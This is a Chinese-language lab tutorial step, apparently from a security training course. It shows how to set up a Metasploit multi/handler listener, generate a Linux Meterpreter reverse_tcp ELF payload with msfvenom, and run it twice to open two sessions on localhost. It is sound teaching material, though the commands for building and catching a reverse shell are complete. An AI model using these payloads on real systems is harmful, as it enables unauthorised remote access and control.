获取多个 Meterpreter 或 shell 会话
在此步骤中,你将在 Metasploit 中设置一个监听器,然后执行一个 payload 来创建两个独立的 Meterpreter 会话。这模拟了访问两个不同系统的过程。
首先,打开一个终端并启动 Metasploit Framework 控制台。-q 标志使其静默启动,不显示横幅。
msfconsole -q
接下来,我们将配置一个通用的监听器,称为 multi/handler,以等待传入连接。
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
现在,使用 -j 标志将监听器作为后台作业运行。这使得 msfconsole 提示符保持可用,以便执行其他命令,同时监听器在后台运行。
run -j
你应该会看到一个确认信息,表明监听器已启动。
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
现在,你需要生成并执行连接回此监听器的 payload。通过点击终端窗口中的 + 图标,打开一个新的、第二个终端标签页。
在这个新终端中,使用 msfvenom 来创建 payload。此命令会生成一个 ELF 可执行文件,该文件运行时将连接回我们的监听器。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
使生成的 payload 文件可执行:
chmod +x ~/project/payload.elf
现在,执行 payload 两次以创建两个会话。我们将它们作为后台进程 (&) 运行,这样你就可以立即再次运行命令。
./payload.elf &
./payload.elf &
切换回你的第一个终端窗口,其中运行着 msfconsole。你将看到指示已打开两个 Meterpreter 会话的消息。
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
你现在已成功建立了两个活动会话。